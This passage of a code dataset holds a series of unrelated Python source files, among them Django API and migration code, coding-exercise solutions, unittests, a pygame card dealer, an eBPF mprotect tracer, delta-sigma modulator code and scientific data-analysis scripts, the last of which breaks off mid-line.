request.user.character_ownerships.all().values_list('character')\n    admin_invoices = models.Invoice.objects.visible_to(\n        request.user).filter(paid=False).exclude(character__in=chars)\n    return 200, admin_invoices\n\n\n@api.get(\n    \"config/corp\",\n    response={200: schema.Corporation},\n    tags=[\"Config\"]\n)\ndef get_payment_corp(request):\n    return EveCorporationInfo.objects.get(corporation_id=PAYMENT_CORP)\n","sub_path":"invoices/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"583390200","text":"# you can write to stdout for debugging purposes, e.g.\n# print(\"this is a debug message\")\n\ndef solution(A):\n    # write your code in Python 3.6\n    leader = max(A, key=lambda x: A.count(x))\n    equi_leaders = 0\n    for i in range(1, len(A)):\n        seq1, seq2 = A[:i], A[i:]\n        \n        if seq1.count(leader) > len(seq1)/2 and seq2.count(leader) > len(seq2)/2:\n            equi_leaders += 1\n        \n    return equi_leaders\n","sub_path":"08-leader/EquiLeader.py","file_name":"EquiLeader.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"30261419","text":"#!/usr/bin/python3\n\"\"\"Unittest for Square module\"\"\"\n\nfrom models.square import Square\nfrom unittest import TestCase\n\n\nclass TestSquare(TestCase):\n    def test_size_get(self):\n        \"\"\" Tests for size method \"\"\"\n\n        s1 = Square(10, 5, 3, 1)\n        self.assertEqual(s1.size, 10)\n\n    def test_size_set(self):\n        \"\"\" Tests for size method \"\"\"\n\n        s1 = Square(10, 5, 3, 1)\n        s1.size = 100\n\n        self.assertEqual(s1.size, 100)\n\n    def test_y_not_int(self):\n        \"\"\" Tests for y method \"\"\"\n\n        r1 = Square(3, 4, 0, 0)\n\n        with self.assertRaises(TypeError):\n            r1.y = \"51\"\n\n    def test_update(self):\n        \"\"\" Tests for update method \"\"\"\n\n        s1 = Square(10, 5, 3, 1)\n        s1.update(11, 6, 4, 2)\n\n        self.assertEqual(s1.id, 11)\n\n        self.assertEqual(s1.size, 6)\n\n        self.assertEqual(s1.x, 4)\n        self.assertEqual(s1.y, 2)\n\n    def test_to_dictionary(self):\n        \"\"\" Tests for to_dictionary method \"\"\"\n\n        test_dict = {'id': 1, 'size': 4, 'x': 2, 'y': 1}\n        r1 = Square(4, 2, 1, 1)\n\n        self.assertEqual(test_dict, r1.to_dictionary())\n","sub_path":"0x0C-python-almost_a_circle/tests/tests_models/test_square.py","file_name":"test_square.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"78598917","text":"#Write a function ask_user() that uses 
input() to ask the user \"How are you?\" until they answer \"Fine\"\n#Create a dictionary of the form \"question\": \"answer\", for example: {\"How are you?\": \"Fine!\", \"What are you doing?\": \"Programming\"} and so on\n#Extend ask_user() so that when the user enters a question that is in the dictionary, the program gives the corresponding answer. For example:\n#User: What are you doing?\n#Program: Programming\n\ndef ask_user(mydict):\n    while True:\n        try:\n            user_say = input('User: > ')\n            answer = mydict.get(user_say, 'I have nothing to say to that, you would do better to ask \"How are you?\"')\n            print('Program: {}'.format(answer))\n        except(KeyboardInterrupt):\n            print('\\nProgram: Bye!')\n            break\n\n\nmydict = {\n    \"How are you?\": \"Fine\",\n    \"What are you doing?\": \"Working\",\n    \"Who are you?\": \"A program\",\n    \"Where are you?\": \"Here\"\n    }\n\n\nif __name__ == '__main__':\n    ask_user(mydict)","sub_path":"example_while.py","file_name":"example_while.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"ru","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"315157659","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 23 19:48:56 2020\r\n\r\n@author: Will\r\n\"\"\"\r\n\r\nfrom collections import defaultdict\r\nfrom save_output import save, load\r\nfrom experiments import Experiment\r\nfrom setting import Setting\r\nfrom plots import plot_q, plot_action\r\nfrom games import PD, SignalPD\r\nfrom stats import *\r\n\r\n\r\n['A00', 'A01', 'A02', 'A03', 'A04']\r\n['A11', 'A12', 'A13', 'A14']\r\n['B00', 'B01', 'B02', 'B03', 'B04']\r\n['B11', 'B12', 'B13', 'B14']\r\n['A13b', 'A13c']\r\n['B11b', 'B12b', 'B13b']\r\n['B11c', 'B12c', 'B13c']\r\n['B11d', 'B12d', 'B13d']\r\n\r\n\r\nfor x in ['C1102']:\r\n    \r\n    e = Experiment(x)\r\n    \r\n    if x in ['A13b', 'A13c', 'B11b', 'B12b', 'B13b', 'B11d', 'B12d', 'B13d']:\r\n        e.run_experiment(trials = 1000, training_period = 20000) \r\n    \r\n    else:\r\n        e.run_experiment(trials = 1000)\r\n    \r\n    # With 1000 trials, keep only the last 1024 q_values (to reduce file size)\r\n#    for trial in e.records['q_values']:\r\n#        for player in e.records['q_values'][trial]:\r\n#            \r\n#            e.records['explore'][trial][player] = e.records['explore'][trial][player][-1024:]\r\n#            e.records['action'][trial][player] = e.records['action'][trial][player][-1024:]\r\n#            \r\n#            for state in e.records['q_values'][trial][player]:\r\n#                for action in e.records['q_values'][trial][player][state]:\r\n#                    e.records['q_values'][trial][player][state][action] = e.records['q_values'][trial][player][state][action][-1024:]\r\n    \r\n    save(e.records, x)\r\n    \r\n    #plot_q(exp[x].records)\r\n    #plot_action(exp[x].records)\r\n    print('Experiment:', x)\r\n    a = aggr_avg_rewards(calc_avg_rewards(e.records))\r\n    print('Avg. 
rewards:', a)\r\n o = aggr_outcome_prob(calc_outcome_prob(e.records))\r\n print('Outcome prob:', o, '\\n')\r\n","sub_path":"run_exp.py","file_name":"run_exp.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"375703336","text":"from django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('rest_hooks', '0001_initial'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='FailedHook',\n fields=[\n ('id', models.BigAutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('last_retry', models.DateTimeField(auto_now=True, db_index=True)),\n ('target', models.URLField(verbose_name='Original target URL', max_length=255, editable=False, db_index=True)),\n ('event', models.CharField(db_index=True, verbose_name='Event', max_length=64, editable=False, choices=[('customer.created', 'customer.created'), ('customer.deleted', 'customer.deleted'), ('customer.updated', 'customer.updated'), ('invoice.created', 'invoice.created'), ('invoice.deleted', 'invoice.deleted'), ('invoice.updated', 'invoice.updated'), ('plan.created', 'plan.created'), ('plan.deleted', 'plan.deleted'), ('plan.updated', 'plan.updated'), ('proforma.created', 'proforma.created'), ('proforma.deleted', 'proforma.deleted'), ('proforma.updated', 'proforma.updated'), ('provider.created', 'provider.created'), ('provider.deleted', 'provider.deleted'), ('provider.updated', 'provider.updated'), ('subscription.created', 'subscription.created'), ('subscription.deleted', 'subscription.deleted'), ('subscription.updated', 'subscription.updated')])),\n ('payload', models.TextField(editable=False)),\n ('response_headers', models.TextField(max_length=65535, editable=False)),\n ('response_body', models.TextField(max_length=65535, editable=False)),\n ('last_status', models.PositiveSmallIntegerField(editable=False, db_index=True)),\n ('retries', models.PositiveIntegerField(default=1, editable=False, db_index=True)),\n ('hook', models.ForeignKey(editable=False, to='rest_hooks.Hook', on_delete=models.PROTECT)),\n ('user', models.ForeignKey(editable=False, to=settings.AUTH_USER_MODEL, on_delete=models.PROTECT)),\n ],\n options={\n 'ordering': ('-last_retry',),\n },\n ),\n migrations.AlterUniqueTogether(\n name='failedhook',\n unique_together=set([('target', 'event', 'user', 'hook')]),\n ),\n ]\n","sub_path":"rest_hooks_delivery/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"632379337","text":"#!/usr/bin/env python3\n#-*-coding:utf-8-*-\n\n# Create a list that represnts a deck of playing cards,\n# shuffle them and deal 5 cards showing their graphical representation.\n\n# cards[0:13] - 2 - 10, Jack, Queen, King, Ace (Hearths)\n# cards[13:27] - 2 - 10, Jack, Queen, King, Ace (Diamonds)\n# cards[27:40] - 2 - 10, Jack, Queen, King, Ace (Clubs)\n# cards[40:52] - 2 - 10, Jack, Queen, King, Ace (Spades)\n\n# Each card is 81x117.\n\nimport pygame, random\n\nSCREEN_WIDTH = 640\nSCREEN_HEIGHT = 480\nCARD_WIDTH = 81\nCARD_HEIGHT = 117\ncards_image = pygame.image.load(\"cards.gif\")\n\nclass Card:\n def __init__(self, img, posn, card_number):\n self.image = img\n self.card_number = card_number\n self.posn = (posn * (CARD_WIDTH+30))+30, 
SCREEN_HEIGHT//2\n        self.row = (card_number // 13) # Card color\n        self.column = (card_number % 13) # Card rank\n        self.order = posn\n\n    def __str__(self):\n        info = \"Card number: {}\\n\".format(self.card_number)\n        info += \"Position: {}\\n\".format(self.order)\n        info += \"(x,y) : {}\\n\".format(self.posn)\n        info += \"Column/rank: {}; row/color: {}\\n\".format(self.column, self.row)\n        info += \"Slice: {}\\n\".format((self.column * CARD_WIDTH, self.row * CARD_HEIGHT, CARD_WIDTH, CARD_HEIGHT))\n        return info\n\n\n    def draw(self, target_surface):\n        card_slice = (self.column * CARD_WIDTH, self.row * CARD_HEIGHT, CARD_WIDTH, CARD_HEIGHT)\n        target_surface.blit(self.image, self.posn, card_slice)\n\ndef pick_five():\n    \"\"\" Returns a list of five integers from range 0-51. \"\"\"\n    deck = list(range(52))\n    random.shuffle(deck)\n    return deck[0:5]\n\ndef shuffle_cards():\n    \"\"\" Shuffle cards and create new hand of five. \"\"\"\n    hand = []\n    cards_list = pick_five()\n    for inx,value in enumerate(cards_list):\n        hand.append(Card(cards_image, inx, value))\n    return hand\n\ndef main():\n    pygame.init()\n    my_clock = pygame.time.Clock()\n    surface = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n    background_color = (0,100,0)\n    alive = True\n    hand = shuffle_cards()\n\n\n    for card in hand:\n        print(card)\n\n    while alive:\n        ev = pygame.event.poll()\n        if ev.type == pygame.QUIT:\n            alive = False\n        if ev.type == pygame.KEYDOWN:\n            key = ev.dict[\"key\"]\n            if key == 27:\n                alive = False\n            if key == ord(\"s\"):\n                hand = shuffle_cards()\n\n        background = (0,0, SCREEN_WIDTH, SCREEN_HEIGHT)\n        surface.fill(background_color, background)\n\n        for card in hand:\n            card.draw(surface)\n\n        my_clock.tick(30)\n        pygame.display.flip()\n\n    pygame.quit()\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"How_to_Think_Like_a_Computer_Scientist/chapter17/cards_dealing.py","file_name":"cards_dealing.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"430589685","text":"class Solution(object):\n    def findRadius(self, houses, heaters):\n        \"\"\"\n        :type houses: List[int]\n        :type heaters: List[int]\n        :rtype: int\n        \"\"\"\n        \n        heaters_set = set()\n        for position in heaters:\n            heaters_set.add(position)\n\n\nif __name__ == '__main__':\n    sol = Solution()\n\n    testcase1 = ([1,2,3],[2])\n    result1 = sol.findRadius(testcase1[0], testcase1[1])\n    print(result1)\n\n    testcase2 = ([1,2,3,4],[1, 4])\n    result2 = sol.findRadius(testcase2[0], testcase2[1])\n    print(result2)\n\n","sub_path":"python/fail.475.py","file_name":"fail.475.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"464297944","text":"#!/usr/bin/python\n# @lint-avoid-python-3-compatibility-imports\n#\n# mprotectsnoop Trace mprotect() syscall.\n# For Linux, uses BCC, eBPF. Embedded C.\n#\n# Written as a basic example of BCC trace & reformat. 
See\n# examples/hello_world.py for a BCC trace with default output example.\n#\n# Copyright (c) 2015 Andreas Schnebinger.\n# Licensed under the Apache License, Version 2.0 (the \"License\")\n#\n# 16-Sep-2020 Andreas Schnebinger Created this.\n\nfrom __future__ import print_function\nfrom bcc import BPF\n\n# load BPF program\nb = BPF(text=\"\"\"\n#include \n\nstruct data_t {\n u32 pid;\n char comm[TASK_COMM_LEN];\n u64 ts;\n};\n\nBPF_PERF_OUTPUT(events);\n\nvoid syscall__mprotect(void *ctx) {\n struct data_t data = {};\n data.pid = bpf_get_current_pid_tgid();\n bpf_get_current_comm(&data.comm, sizeof(data.comm));\n data.ts = bpf_ktime_get_ns() / 1000;\n events.perf_submit(ctx, &data, sizeof(data));\n};\n\"\"\")\nb.attach_kprobe(event=b.get_syscall_fnname(\"mprotect\"),\n fn_name=\"syscall__mprotect\")\n\n# header\nprint(\"%-6s %-16s %-18s %s\" % (\"PID\", \"CMD\", \"TIME(s)\", \"CALL\"))\n\n# process event\ndef print_event(cpu, data, size):\n event = b[\"events\"].event(data)\n print(\"%-6d %-16s %-18.9f mprotect()\" % (event.pid, event.comm.decode('utf-8', 'replace'), (float(event.ts) / 1000000)))\n\n# loop with callback to print_event\nb[\"events\"].open_perf_buffer(print_event)\nwhile 1:\n try:\n b.perf_buffer_poll()\n except KeyboardInterrupt:\n exit()\n","sub_path":"tools/mprotectsnoop.py","file_name":"mprotectsnoop.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"481583300","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/airflow/example_dags/example_pig_operator.py\n# Compiled at: 2019-09-11 03:47:34\n# Size of source mod 2**32: 1230 bytes\nimport airflow\nfrom airflow.models import DAG\nfrom airflow.operators.pig_operator import PigOperator\nargs = {'owner':'airflow', \n 'start_date':airflow.utils.dates.days_ago(2)}\ndag = DAG(dag_id='example_pig_operator',\n default_args=args,\n schedule_interval=None)\nrun_this = PigOperator(task_id='run_example_pig_script',\n pig='ls /;',\n pig_opts='-x local',\n dag=dag)\nrun_this","sub_path":"pycfiles/apache_airflow_arup-1.10.5-py3.6/example_pig_operator.cpython-36.py","file_name":"example_pig_operator.cpython-36.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"479270584","text":"# -*- coding: utf-8 -*-\r\n# _dsmap.py\r\n# Module providing the bilogplot function\r\n# Copyright 2020 Yuki Fukuda\r\n# This file is part of python-deltasigma(forked).\r\n#\r\n# python-deltasigma is a 1:1 Python replacement of Richard Schreier's\r\n# MATLAB delta sigma toolbox (aka \"delsigma\"), upon which it is heavily based.\r\n# The delta sigma toolbox is (c) 2009, Richard Schreier.\r\n#\r\n# python-deltasigma is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\r\n# LICENSE file for the licensing terms.\r\n\r\nfrom .._ds_quantize import ds_quantize\r\nfrom ._sgn import sgn\r\nimport numpy as np\r\n\r\ndef dsmap(u:np.ndarray, ABCD:np.ndarray, nlev:int, x:np.ndarray, e:np.ndarray, v=None)->np.ndarray:\r\n    \"\"\"function nx = dsmap(u,ABCD,nlev,x,e,v)\r\n\r\n    For a DSM with input u, a structure ABCD and an nlev-level quantizer,\r\n    compute the (potential) vertices of the image of a convex object \r\n    described in terms of its vertices (x) and edges (e).\r\n    If u has two elements, it is considered to represent a range.\r\n    v is the assumed quantizer output; it is computed if it is not supplied.\r\n\r\n    Basic Algorithm:\r\n    1) Compute the images of the vertices.\r\n    2) For those edges which cross a splitting hyperplane,\r\n       compute the images of each split point.\r\n    3) For u-ranges, append the translated images to the list.\r\n\r\n    \"\"\"\r\n\r\n    n = np.shape(ABCD)[0] - 1\r\n    A = ABCD[0:n, 0:n]\r\n    B = ABCD[0:n, n:n+2]\r\n    C = ABCD[n, 0:n]\r\n    D1 = ABCD[n, n]\r\n\r\n    N = np.shape(x)[1]\r\n    if np.max(np.shape(u)) == 2:\r\n        u2 = u[1]\r\n        u = u[0]\r\n        isRange = True\r\n        if D1 != 0:\r\n            print(\"Limitation: D1 must be zero.\")\r\n            return\r\n        \r\n    elif np.max(np.shape(u)) == 1:\r\n        isRange = False\r\n        \r\n    else:\r\n        print(\"Error. The dimensions of u are wrong.\")\r\n        return\r\n\r\n    \r\n    # Compute y, and v if it was not supplied. The assumption that D1 = 0 for u-ranges is implicit in this step.\r\n    y = C*x + D1*u\r\n    if v is None:\r\n        v = ds_quantize(y, nlev)\r\n    elif np.max(np.shape(v)) == 1:\r\n        v = np.tile(v[0], (1, N))\r\n    elif np.max(np.shape(v)) != N:\r\n        print(\"error: the supplied v argument is the wrong size.\")\r\n        return\r\n\r\n    # 1) Compute the images of the vertices\r\n    B1u = B[:, 0] * u\r\n    nx = A*x + np.tile(B1u[:, 0], (1, N)) + B[:, 1]*v\r\n\r\n    # 2) For those edges which cross a (or several) splitting hyperplanes,\r\n    #    compute the two images of each split point\r\n    diff = np.abs(v[e[0, :]] - v[e[1, :]])\r\n    split1 = (diff == 2) # edges split in one place only\r\n\r\n    # Handle the split1 edges en masse.\r\n    if split1.any():\r\n        i1 = e[0, np.nonzero(split1)]\r\n        i2 = e[1, np.nonzero(split1)]\r\n        y0 = 0.5*(v[i1]+v[i2]) # The appropriate quantizer thresholds\r\n        k1 = (y[i2]-y0)/(y[i2]-y[i1])\r\n        k2 = 1 - k1\r\n        psplit = np.tile(k1[0, :], (n, 1))*x[:, i1] + np.tile(k2[0, :], (n, 1))*x[:, i2]\r\n        N = np.max(np.shape(k1))\r\n        images1 = A*psplit + np.tile(B1u[:, 0], (1, N)) + B[:, 1]*v[i1]\r\n        images2 = images1 + B[:, 1]*(v[i2] - v[i1])\r\n        nx = np.hstack([nx, images1, images2])\r\n\r\n    \r\n    # Treat the multiply-split edges as a special case.\r\n    split2 = np.where(diff > 2)\r\n    for i in split2[0]:\r\n        i1 = e[0, i]\r\n        i2 = e[1, i]\r\n        v1 = v[i1]\r\n        v2 = v[i2]\r\n        x1 = x[:, i1]\r\n        x2 = x[:, i2]\r\n        y1 = y[i1]\r\n        y2 = y[i2]\r\n        dv = v2 - v1\r\n        N = int(np.abs(dv)//2)\r\n        y0 = v1 + sgn(dv) # The first quantizer threshold crossed\r\n        k1 = (y2-y0)/(y2-y1)\r\n        k2 = 1 - k1\r\n        x0 = k1*x1 + k2*x2 # The first split point\r\n        image0 = A*x0 + B1u + B[:, 1]*v1 # Its image\r\n        deltaB = B[:, 1]*(2*dv) # The image shift due to splitting\r\n        A_deltax = A*((x2-x1)/(0.5*(y2-y1))) # The image shift due to x\r\n        images = np.tile(image0[:, 0], (1, N)) + A_deltax*np.arange(0, N, 1)\r\n        images = np.hstack([images, images+np.tile(deltaB[:, 0], (1, N))])\r\n        nx = np.hstack([nx, images]) # append the split-point images to the vertex list\r\n\r\n    \r\n    # 3) For u-ranges, append the translated images to the list\r\n    if isRange:\r\n        translation = (u2-u)*ABCD[0:n, n]\r\n        nx = np.hstack([nx, nx+np.tile(translation[:, 0], (1, np.shape(nx)[1]))])\r\n    \r\n    return 
nx","sub_path":"deltasigma/beta/PosInvSet/_dsmap.py","file_name":"_dsmap.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"271215910","text":"import spectroseti.apf as apf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.io import fits\nimport seaborn as sb\nimport spectroseti.apf as apf\nimport spectroseti.apfdefinitions as apfdefs\nfrom os import listdir, mkdir\nimport spectroseti.utilities as util\nimport csv\nimport scipy.signal as sg\nimport pickle\n\nimport pandas as pd\nfrom xarray import Dataset\n\n\nrun_name = 'bkjRunJun16'\nfolder_name = apfdefs.laser_search_run_dir + run_name + '/'\n\nall_reduced = listdir(folder_name)\nfiles_to_collate = [fn for fn in all_reduced if fn[-2:] == '.p']\n\n\nd = dict()\nall_devs = []\nfor f in files_to_collate:\n pickle_off = open(folder_name+f, \"rb\")\n emp = pickle.load(pickle_off)\n name = f[1:8]\n flat_dict = dict()\n flat_dict.update(emp['meta'])\n devs = emp['devs']\n meta = emp['meta']\n order_medians = emp['order_medians']\n color_index = order_medians[61]/order_medians[21]\n # devs_list = []\n run = meta['run']\n obs = meta['obs']\n for dev in devs:\n counts_per_mad = dev['dev'][4]\n all_devs.append(\n {\n 'run': run,\n 'obs': obs,\n 'cosmic_reject_value': dev['cosmic_reject_value'],\n 'order': dev['dev'][0],\n 'num_pixels': dev['dev'][1],\n 'start_pixel': dev['dev'][2],\n 'continuum_val': dev['dev'][3],\n 'MAD': dev['dev'][4],\n 'threshold': dev['dev'][3] + dev['dev'][4] * meta['number_mads'],\n 'peak_pixel_value': (dev['dev'][8] - dev['dev'][3])/counts_per_mad,\n 'mean_deviant_pixel_value': (dev['dev'][5] - dev['dev'][3])/counts_per_mad,\n 'median_deviant_pixel_value': (dev['dev'][6] - dev['dev'][3])/counts_per_mad,\n 'central_wav': dev['dev'][7],\n 'intensity': (dev['dev'][5] - dev['dev'][3]) * dev['dev'][1] / counts_per_mad,\n 'color_index': color_index,\n 'target_name': meta['target_name'],\n 'exposure_time': meta['exposure_time'],\n 'RA': meta['RA'],\n 'DEC': meta['DEC'],\n 'HA': meta['HA'],\n 'AZ': meta['AZ'],\n 'reduced_filename': 'r%(run)s.%(obs)s.fits' % locals(),\n 'raw_filename': 'ucb-%(run)s%(obs)s.fits' % locals()\n }\n )\n # Now we should make a .csv of all of these data\n keys = ['run',\n 'obs',\n 'cosmic_reject_value',\n 'order',\n 'num_pixels',\n 'start_pixel',\n 'continuum_val',\n 'MAD',\n 'threshold',\n 'peak_pixel_value',\n 'mean_deviant_pixel_value',\n 'median_deviant_pixel_value',\n 'central_wav',\n 'intensity',\n 'color_index',\n 'target_name',\n 'exposure_time',\n 'RA',\n 'DEC',\n 'HA',\n 'AZ',\n 'reduced_filename',\n 'raw_filename']\n filename = apfdefs.laser_search_run_dir + '/' + run_name +'_metadata.csv'\n with open(filename, 'wb') as output_file:\n writer = csv.DictWriter(\n output_file, fieldnames=keys)\n writer.writeheader()\n writer.writerows(all_devs)\n output_file.close()\n\n # flat_dict['devs'] = pd.DataFrame(devs_list)\n # flat_dict['order_meta'] = pd.DataFrame(map(\n # lambda x, y, i: {'order': i, 'order_median': x, 'percentile': y[0], 'threshold': y[1]},\n # emp['order_medians'],\n # emp['percentiles_and_thresholds'],\n # range(len(emp['order_medians']))\n # ))\n # d[name] = flat_dict\n\n\n\n# This needs to be massaged into a workable format. 
The above code is a good scaffold on which to do this.\n","sub_path":"scripts/collate_metadata.py","file_name":"collate_metadata.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"354977929","text":"import scipy.io as sio\nimport numpy as np\nimport tkinter as tk\nimport sys\nimport matplotlib.pyplot as plt\nplt.rcParams.update({'font.size': 22})\n\nplt.interactive(True)\n\n\ndx=0.05\ndz=0.025\n\nni=34\nnj=49\nnk=34\n\n\nviscos=1./5200.\n\n#---- read v_1 ... v_8 & transform each to a 3D array (files 1-8)\n# N.B.- We don't have to switch axes since Python and Fortran store the arrays in the same way\nu_parts, v_parts, w_parts, te_parts, eps_parts = [], [], [], [], []\nfor nfile in range(1, 9):\n u_parts.append(np.reshape(sio.loadmat('u%d_IDD_PANS.mat' % nfile)['u%d_IDD_PANS' % nfile], (nk,nj,ni)))\n v_parts.append(np.reshape(sio.loadmat('v%d_IDD_PANS.mat' % nfile)['v%d_IDD_PANS' % nfile], (nk,nj,ni)))\n w_parts.append(np.reshape(sio.loadmat('w%d_IDD_PANS.mat' % nfile)['w%d_IDD_PANS' % nfile], (nk,nj,ni)))\n te_parts.append(np.reshape(sio.loadmat('te%d_IDD_PANS.mat' % nfile)['te%d_IDD_PANS' % nfile], (nk,nj,ni)))\n eps_parts.append(np.reshape(sio.loadmat('eps%d_IDD_PANS.mat' % nfile)['eps%d_IDD_PANS' % nfile], (nk,nj,ni)))\n\n\n# merge the 8 files. This means that the new ni = 8*ni\nu3d=np.concatenate(u_parts, axis=0)\nv3d=np.concatenate(v_parts, axis=0)\nw3d=np.concatenate(w_parts, axis=0)\nte3d=np.concatenate(te_parts, axis=0)\neps3d=np.concatenate(eps_parts, axis=0)\n\n\n# x coordinate direction = index 0, first index\n# y coordinate direction = index 1, second index\n# z coordinate direction = index 2, third index\n\n\n\nni=len(u3d)\n\nx=dx*ni\nz=dz*nk\n\n\numean=np.mean(u3d, axis=(0,2))\nvmean=np.mean(v3d, axis=(0,2))\nwmean=np.mean(w3d, axis=(0,2))\ntemean=np.mean(te3d, axis=(0,2))\nepsmean=np.mean(eps3d, axis=(0,2))\n\n# face coordinates\nyc = np.loadtxt(\"yc.dat\")\n\n# cell center coordinates\ny= np.zeros(nj)\ndy=np.zeros(nj)\nfor j in range (1,nj-1):\n# dy = cell width\n dy[j]=yc[j]-yc[j-1]\n y[j]=0.5*(yc[j]+yc[j-1])\n\ny[nj-1]=yc[nj-1]\ntauw=viscos*umean[1]/y[1]\nustar=tauw**0.5\nyplus=y*ustar/viscos\n\nDNS=np.genfromtxt(\"LM_Channel_5200_mean_prof.dat\", dtype=None,comments=\"%\")\ny_DNS=DNS[:,0]\nyplus_DNS=DNS[:,1]\nu_DNS=DNS[:,2]\nw_DNS=DNS[:,4]\n\nDNS=np.genfromtxt(\"LM_Channel_5200_vel_fluc_prof.dat\", dtype=None,comments=\"%\")\n\nu2_DNS=DNS[:,2]\nv2_DNS=DNS[:,3]\nw2_DNS=DNS[:,4]\nuv_DNS=DNS[:,5]\n\nk_DNS=0.5*(u2_DNS+v2_DNS+w2_DNS)\n\n# find equidistant DNS cells in log-scale\nxx=0.\njDNS=[1]*40\nfor i in range (0,40):\n i1 = (np.abs(10.**xx-yplus_DNS)).argmin()\n jDNS[i]=int(i1)\n xx=xx+0.2\n \n# ---- Plot\n\n# ---- U2\ndef plot_mean_velocity_profile_u():\n fig1,ax1 = plt.subplots()\n plt.subplots_adjust(left=0.20,bottom=0.20)\n \n plt.semilogx(yplus,umean/ustar,'b-')\n plt.semilogx(yplus_DNS[jDNS],u_DNS[jDNS],'bo')\n plt.axis([1, 8000, 0, 31])\n plt.ylabel(\"$U^+$\")\n plt.xlabel(\"$y^+$\")\n\ndef plot_mean_velocity_profile_w():\n fig2,ax2 = plt.subplots()\n plt.subplots_adjust(left=0.20,bottom=0.20)\n \n plt.semilogx(yplus,wmean/ustar,'b-')\n plt.semilogx(yplus_DNS[jDNS],w_DNS[jDNS],'bo')\n plt.axis([1, 8000, 0, 1])\n plt.ylabel(\"$W^+$\")\n plt.xlabel(\"$y^+$\")\n\n# ---- U3\n \nuvmean1= np.mean((u3d-umean[None,:,None])*(v3d-vmean[None,:,None]), axis=(0,2))\nuumean = np.mean((u3d-umean[None,:,None])*(u3d-umean[None,:,None]), axis=(0,2))\nvvmean = np.mean((v3d-vmean[None,:,None])*(v3d-vmean[None,:,None]), axis=(0,2))\nwwmean = np.mean((w3d-wmean[None,:,None])*(w3d-wmean[None,:,None]), axis=(0,2))\n\nte_resolved = 0.5*(uumean + vvmean + wwmean)\n\ndef uv_stress_resolved():\n plt.figure(\"uv_Stress_resolved\")\n plt.plot(yplus, uvmean1)\n plt.title('Resolved uv Stress')\n plt.ylabel(\"$\\\\langle u^\\prime v^\\prime \\\\rangle$\")\n plt.xlabel(\"$y^+$\")\n\n# ---- U4\ndef te_plot():\n plt.figure(\"Turbulent Kinetic Energy\")\n plt.plot(yplus, temean, label='$k_{modelled}$')\n plt.plot(yplus, te_resolved, label='$k_{resolved}$')\n plt.plot(yplus, te_resolved + temean, label='$k_{tot}$')\n plt.title('Turbulent Kinetic Energy')\n plt.ylabel(\"$k$\")\n plt.xlabel(\"$y^+$\")\n plt.legend()\n\nline08 = np.ones(np.size(yplus))\nline_boundary = np.ones(np.size(yplus))\ndef te_plot_ratio():\n plt.figure(\"Turbulent Kinetic Energy ratio\")\n plt.plot(yplus, te_resolved/(te_resolved + temean), 'k-', label = '$\\\\frac{k_{res}}{k_{tot}}$')\n plt.plot(270*line_boundary, np.linspace(0,1, np.size(temean)), 'r-', label = 'Boundary')\n plt.plot(yplus, 0.8*line08, 'g-', label = '0.8 limit')\n plt.title('Turbulent 
